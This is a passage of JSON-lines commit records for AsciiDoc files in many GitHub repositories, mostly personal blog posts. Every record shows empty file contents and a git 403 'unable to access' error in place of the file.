403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6baaa91832834182ca1c1b836c81049dd5bf0ff0","subject":"y2b create post It Can Hyper Chill Warm Drinks Instantly","message":"y2b create post It Can Hyper Chill Warm Drinks Instantly","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-10-It-Can-Hyper-Chill-Warm-Drinks-Instantly.adoc","new_file":"_posts\/2017-08-10-It-Can-Hyper-Chill-Warm-Drinks-Instantly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fef3b14e40b4b92a43a8d61bab5e55ca4251ac3","subject":"Update 2015-11-28-The-future-is-already-here-its-just-not-very-evenly-distributed.adoc","message":"Update 2015-11-28-The-future-is-already-here-its-just-not-very-evenly-distributed.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-11-28-The-future-is-already-here-its-just-not-very-evenly-distributed.adoc","new_file":"_posts\/2015-11-28-The-future-is-already-here-its-just-not-very-evenly-distributed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4bcfed75e9b188bd6fb3930e680315b8fa94898","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/create-worker\/http-response.adoc","new_file":"xill-web-service\/tmp-test\/create-worker\/http-response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73af89534a2236d4e108dac5cfbdf04c71fa986f","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8967de4f3bfa64b3a6f6898f65e6deb36adab5c","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62071563d41a08409d6ec6e0c7735c02557f5bd3","subject":"Starting to work on api docs","message":"Starting to work on api docs\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/api\/xatmi\/tpsetunsol.adoc","new_file":"doc\/api\/xatmi\/tpsetunsol.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b0cd543dca193c9f65d9fc3c476dad9a56be0563","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81aeb3bb6f4b7a0c0342616b1c7d18dda00015cf","subject":"Renamed '_posts\/2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc' to '_posts\/2017-12-02-Structured-logging-with-SL-FJ-and-Logback.adoc'","message":"Renamed '_posts\/2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc' to '_posts\/2017-12-02-Structured-logging-with-SL-FJ-and-Logback.adoc'","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-12-02-Structured-logging-with-SL-FJ-and-Logback.adoc","new_file":"_posts\/2017-12-02-Structured-logging-with-SL-FJ-and-Logback.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b59b0b6d387766ff579c2439103a2852d7d01876","subject":"Create Features.adoc","message":"Create Features.adoc","repos":"igagis\/svgren,igagis\/svgren,igagis\/svgren","old_file":"wiki\/Features.adoc","new_file":"wiki\/Features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/svgren.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e7cc599f879215ba7ee803625a943e7a2af6ee9","subject":"Minor fixes in the MVP section","message":"Minor fixes in the MVP section\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db985e955add75dd0077e8201013b737b4d41a83","subject":"Update 2015-11-03-Hello.adoc","message":"Update 2015-11-03-Hello.adoc","repos":"ferandec\/ferandec.github.io,ferandec\/ferandec.github.io,ferandec\/ferandec.github.io","old_file":"_posts\/2015-11-03-Hello.adoc","new_file":"_posts\/2015-11-03-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ferandec\/ferandec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"246443fd7d9f8475bcce279a782ff5727de7228c","subject":"Update 2016-10-25-S-R-E.adoc","message":"Update 2016-10-25-S-R-E.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-10-25-S-R-E.adoc","new_file":"_posts\/2016-10-25-S-R-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df5cf3b0fea9b9940276f4ae1363f253e4a10efa","subject":"Update 2017-07-28-mecab.adoc","message":"Update 2017-07-28-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-mecab.adoc","new_file":"_posts\/2017-07-28-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77eb272323b5558ba6c970f31cf0d7eeff045f8c","subject":"Update 2019-01-31-Titre.adoc","message":"Update 2019-01-31-Titre.adoc","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2019-01-31-Titre.adoc","new_file":"_posts\/2019-01-31-Titre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23048dd5345e0a90d750d23f822c8ecf61211007","subject":"Update 2016-09-03-IT-experts-you-should-follow-on-twitter.adoc","message":"Update 2016-09-03-IT-experts-you-should-follow-on-twitter.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-09-03-IT-experts-you-should-follow-on-twitter.adoc","new_file":"_posts\/2016-09-03-IT-experts-you-should-follow-on-twitter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0000d694467e92d589ab06a29ae7ff846cffec0f","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"874e893f0bbfcd8d45c13a1e0a3edb73dcd12e44","subject":"chore(promise-chain): s\/\u975e\u540c\u671f\u51e6\u7406\u304c\u52a0\u3048\u305f\/\u975e\u540c\u671f\u51e6\u7406\u3092\u52a0\u3048\u305f\/","message":"chore(promise-chain): s\/\u975e\u540c\u671f\u51e6\u7406\u304c\u52a0\u3048\u305f\/\u975e\u540c\u671f\u51e6\u7406\u3092\u52a0\u3048\u305f\/\n","repos":"azu\/promises-book,liyunsheng\/promises-book,oToUC\/promises-book,purepennons\/promises-book,azu\/promises-book,genie88\/promises-book,cqricky\/promises-book,oToUC\/promises-book,dieface\/promises-book,liubin\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,wenber\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,mzbac\/promises-book,genie88\/promises-book,xifeiwu\/promises-book,lidasong2014\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,azu\/promises-book,liubin\/promises-book,wangwei1237\/promises-book,cqricky\/promises-book,tangjinzhou\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,liubin\/promises-book,wenber\/promises-book,mzbac\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,genie88\/promises-book,azu\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,liyunsheng\/promises-book,wenber\/promises-book,lidasong2014\/promises-book,oToUC\/promises-book,liyunsheng\/promises-book,cqricky\/promises-book,sunfurong\/promise,sunfurong\/promise,mzbac\/promises-book,charlenopires\/promises-book","old_file":"Ch4_AdvancedPromises\/promise-chain.adoc","new_file":"Ch4_AdvancedPromises\/promise-chain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ec6534d83499ea0e4856762f46d192be3a14446","subject":"Update and rename goci-interfaces\/goci-ui\/src\/main\/docs to goci-interfaces\/goci-ui\/src\/main\/docs\/fileheaders-content.adoc","message":"Update and rename goci-interfaces\/goci-ui\/src\/main\/docs to goci-interfaces\/goci-ui\/src\/main\/docs\/fileheaders-content.adoc","repos":"EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci","old_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/fileheaders-content.adoc","new_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/fileheaders-content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EBISPOT\/goci.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f18e2ac5f496f83b6ff491e3c84d43ebc264007","subject":"Update 2016-01-05-Why-Theres-No-Relationship-Version-Control.adoc","message":"Update 2016-01-05-Why-Theres-No-Relationship-Version-Control.adoc","repos":"blackGirlsCode\/blog,blackGirlsCode\/blog,blackGirlsCode\/blog","old_file":"_posts\/2016-01-05-Why-Theres-No-Relationship-Version-Control.adoc","new_file":"_posts\/2016-01-05-Why-Theres-No-Relationship-Version-Control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blackGirlsCode\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44148156d659cb7c1e598ab1a91b783b015e8cfa","subject":"Update 2016-05-23-Are-some-people-more-Intelligent-than-others-A-Mathematical-Perspective.adoc","message":"Update 2016-05-23-Are-some-people-more-Intelligent-than-others-A-Mathematical-Perspective.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2016-05-23-Are-some-people-more-Intelligent-than-others-A-Mathematical-Perspective.adoc","new_file":"_posts\/2016-05-23-Are-some-people-more-Intelligent-than-others-A-Mathematical-Perspective.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19a026079bf46024f3803a57c68ebccf4ebf9396","subject":"tutorial: publishToConfluence","message":"tutorial: publishToConfluence\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/020_tutorial\/070_publishToConfluence.adoc","new_file":"src\/docs\/020_tutorial\/070_publishToConfluence.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d276d6770c24611dc273f0d914e081a84d5351e5","subject":"Update 2018-01-09-Build-Blog-With-Hub-Press.adoc","message":"Update 2018-01-09-Build-Blog-With-Hub-Press.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2018-01-09-Build-Blog-With-Hub-Press.adoc","new_file":"_posts\/2018-01-09-Build-Blog-With-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2818079ecc54dc1b19d7f50c83edaaad7f476079","subject":"Update 2017-04-12-Quando-il-destino-ha-voglia-di-scherzare.adoc","message":"Update 2017-04-12-Quando-il-destino-ha-voglia-di-scherzare.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-12-Quando-il-destino-ha-voglia-di-scherzare.adoc","new_file":"_posts\/2017-04-12-Quando-il-destino-ha-voglia-di-scherzare.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57d0f5e6d5c611cde78c758a6a68b0f6ef99efc1","subject":"CAMEL-14446 - Create an AWS-ECS component based on SDK v2 - Added docs","message":"CAMEL-14446 - Create an AWS-ECS component based on SDK v2 - Added docs\n","repos":"adessaigne\/camel,tadayosi\/camel,nicolaferraro\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tadayosi\/camel,apache\/camel,zregvart\/camel,pmoerenhout\/camel,adessaigne\/camel,christophd\/camel,tdiesler\/camel,gnodet\/camel,apache\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,mcollovati\/camel,apache\/camel,pax95\/camel,apache\/camel,alvinkwekel\/camel,cunningt\/camel,ullgren\/camel,tdiesler\/camel,cunningt\/camel,pax95\/camel,tdiesler\/camel,adessaigne\/camel,adessaigne\/camel,adessaigne\/camel,nicolaferraro\/camel,christophd\/camel,nikhilvibhav\/camel,DariusX\/camel,cunningt\/camel,tadayosi\/camel,DariusX\/camel,zregvart\/camel,zregvart\/camel,pmoerenhout\/camel,cunningt\/camel,alvinkwekel\/camel,ullgren\/camel,mcollovati\/camel,ullgren\/camel,nikhilvibhav\/camel,tadayosi\/camel,pmoerenhout\/camel,DariusX\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,pmoerenhout\/camel,gnodet\/camel,DariusX\/camel,tadayosi\/camel,ullgren\/camel,apache\/camel,christophd\/camel,mcollovati\/camel,tdiesler\/camel,christophd\/camel,gnodet\/camel,alvinkwekel\/camel,gnodet\/camel,christophd\/camel,cunningt\/camel,pax95\/camel,pax95\/camel,pax95\/camel,mcollovati\/camel,alvinkwekel\/camel,zregvart\/camel,tdiesler\/camel,adessaigne\/camel,pax95\/camel,cunningt\/camel,apache\/camel,christophd\/camel,tdiesler\/camel,tadayosi\/camel,gnodet\/camel","old_file":"components\/camel-aws2-ecs\/src\/main\/docs\/aws2-ecs-component.adoc","new_file":"components\/camel-aws2-ecs\/src\/main\/docs\/aws2-ecs-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b454f83cd041fe229fe52e6286f070bb2f430cbe","subject":"Update 2015-05-25-sehr-kleine-Haubentaucher.adoc","message":"Update 2015-05-25-sehr-kleine-Haubentaucher.adoc","repos":"fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io","old_file":"_posts\/2015-05-25-sehr-kleine-Haubentaucher.adoc","new_file":"_posts\/2015-05-25-sehr-kleine-Haubentaucher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fundstuecke\/fundstuecke.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"109bb36c6be4e92bb2a00e2f4188f772ff881841","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f77a4395225ac0d268208df721135a14c0ff4e6b","subject":"fixed https:\/\/github.com\/docker\/labs\/issues\/352","message":"fixed https:\/\/github.com\/docker\/labs\/issues\/352\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch08-aws.adoc","new_file":"developer-tools\/java\/chapters\/ch08-aws.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"922745ceb1dcc829baa39b26c8e4a47f2ade98a1","subject":"Update 2017-01-04-Keep-English-Learn.adoc","message":"Update 2017-01-04-Keep-English-Learn.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2017-01-04-Keep-English-Learn.adoc","new_file":"_posts\/2017-01-04-Keep-English-Learn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raloliver\/raloliver.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a713ea0d8a5e62e747cd567afdaf13b7610e0a06","subject":"Update 2017-05-09-Dquad-Obsession-V2.adoc","message":"Update 2017-05-09-Dquad-Obsession-V2.adoc","repos":"OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io","old_file":"_posts\/2017-05-09-Dquad-Obsession-V2.adoc","new_file":"_posts\/2017-05-09-Dquad-Obsession-V2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91cf50065ec0c3ad4f3d9615ef5d80dba0824e99","subject":"convert ykinfo manpage to asciidoc","message":"convert ykinfo manpage to asciidoc\n","repos":"eworm-de\/yubikey-personalization,Yubico\/yubikey-personalization-dpkg,eworm-de\/yubikey-personalization,Yubico\/yubikey-personalization,Yubico\/yubikey-personalization-dpkg,Yubico\/yubikey-personalization-dpkg,eworm-de\/yubikey-personalization,Yubico\/yubikey-personalization","old_file":"man\/ykinfo.1.adoc","new_file":"man\/ykinfo.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubikey-personalization.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c9e4b3c07eade9518be4d90cdd5d076e6c79fce0","subject":"y2b create post Are You Carrying Your Keys Smart?","message":"y2b create post Are You Carrying Your Keys Smart?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-12-Are-You-Carrying-Your-Keys-Smart.adoc","new_file":"_posts\/2016-08-12-Are-You-Carrying-Your-Keys-Smart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58eef87c90def3b4920536088a85cfdf7905f608","subject":"Update 2017-01-16-DEUTSCHE-SPRACHBENENNUNGSREFORM-MMXVII.adoc","message":"Update 2017-01-16-DEUTSCHE-SPRACHBENENNUNGSREFORM-MMXVII.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-16-DEUTSCHE-SPRACHBENENNUNGSREFORM-MMXVII.adoc","new_file":"_posts\/2017-01-16-DEUTSCHE-SPRACHBENENNUNGSREFORM-MMXVII.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3dde9257248d7c537f24c25ab79d0c33a03e42d5","subject":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Good-Bad-and-Ugly-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d61b535a83fa3e9ae7e88efa3f9ac5c20e6fddbb","subject":"Update 2017-03-13-Criando-um-projeto-Grails-3-com-Angular-2.adoc","message":"Update 2017-03-13-Criando-um-projeto-Grails-3-com-Angular-2.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2017-03-13-Criando-um-projeto-Grails-3-com-Angular-2.adoc","new_file":"_posts\/2017-03-13-Criando-um-projeto-Grails-3-com-Angular-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ec87ea32bd4ac99818e6437536a09be2843a730","subject":"CL note: more libs","message":"CL note: more libs\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"50f250e7190156be334f349274278d2b8e01aa50","subject":"edit latency","message":"edit latency\n","repos":"kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"trex_stateless.asciidoc","new_file":"trex_stateless.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f8d58a2872937efa069c97341362df42a537bd98","subject":"Update 2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","message":"Update 2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da822f77c01de63531eb206cb3bd35c28d09d2a4","subject":"Update 2015-05-17-Shut-Up.adoc","message":"Update 2015-05-17-Shut-Up.adoc","repos":"flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io","old_file":"_posts\/2015-05-17-Shut-Up.adoc","new_file":"_posts\/2015-05-17-Shut-Up.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flug\/flug.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"083cd03159fbdb9a65ee10c6f43f7bc8319d3e19","subject":"Mid-2018 Release Notes","message":"Mid-2018 Release Notes\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2018-07-01-release.adoc","new_file":"content\/news\/2018-07-01-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ecec606ae0594abf3b70a91ea5826e514fa27999","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fabe008bba78046d76fc7db956e04dd4c5930a82","subject":"Update 2017-07-28-Goal-Tracking.adoc","message":"Update 